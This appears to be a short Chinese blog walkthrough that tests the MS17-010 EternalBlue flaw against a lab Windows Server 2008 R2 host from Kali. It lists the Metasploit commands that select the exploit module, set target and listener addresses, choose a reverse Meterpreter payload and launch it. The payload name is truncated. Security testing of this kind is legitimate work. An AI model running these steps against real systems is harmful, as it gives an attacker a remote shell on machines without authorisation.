Kali对Windows2008/7的MS17010漏洞测试(MSF自带模块)
0x01 说明
其实这个MSF自带的exp模块还是挺让人伤脑筋的,因为它支持的OS并不是很多,也就Windows Server 2008和Win7能用一下,比他们版本低的xp/2003以及比他们版本高的8/2012都不可用,但是纯粹对于Win2008/7而言,这个方案还是比较方便的,毕竟kali系统中MSF自带的一个exp模块。鉴于本博客都是中文,本文原本版本为英文,但是在这里用中文和大家叙述。
0x02 测试环境
目标机:Windows Server 2008 R2 172.16.1.3
攻击机:kali linux
0x03 操作步骤
打开MSF
msfconsole
搜索ms17-010模块
search ms17
使用该模块
use exploit/windows/smb/ms17_010_eternalblue
设置远程主机: set rhost xxx.xxx.xxx.xxx
设置监听主机: set lhost xxx.xxx.xxx.xxx
设置payload :set payload windows/x64/meterpreter/reverse_tc
设置监听端口: set lport 8888 (kali默认4444)
启动: exploit
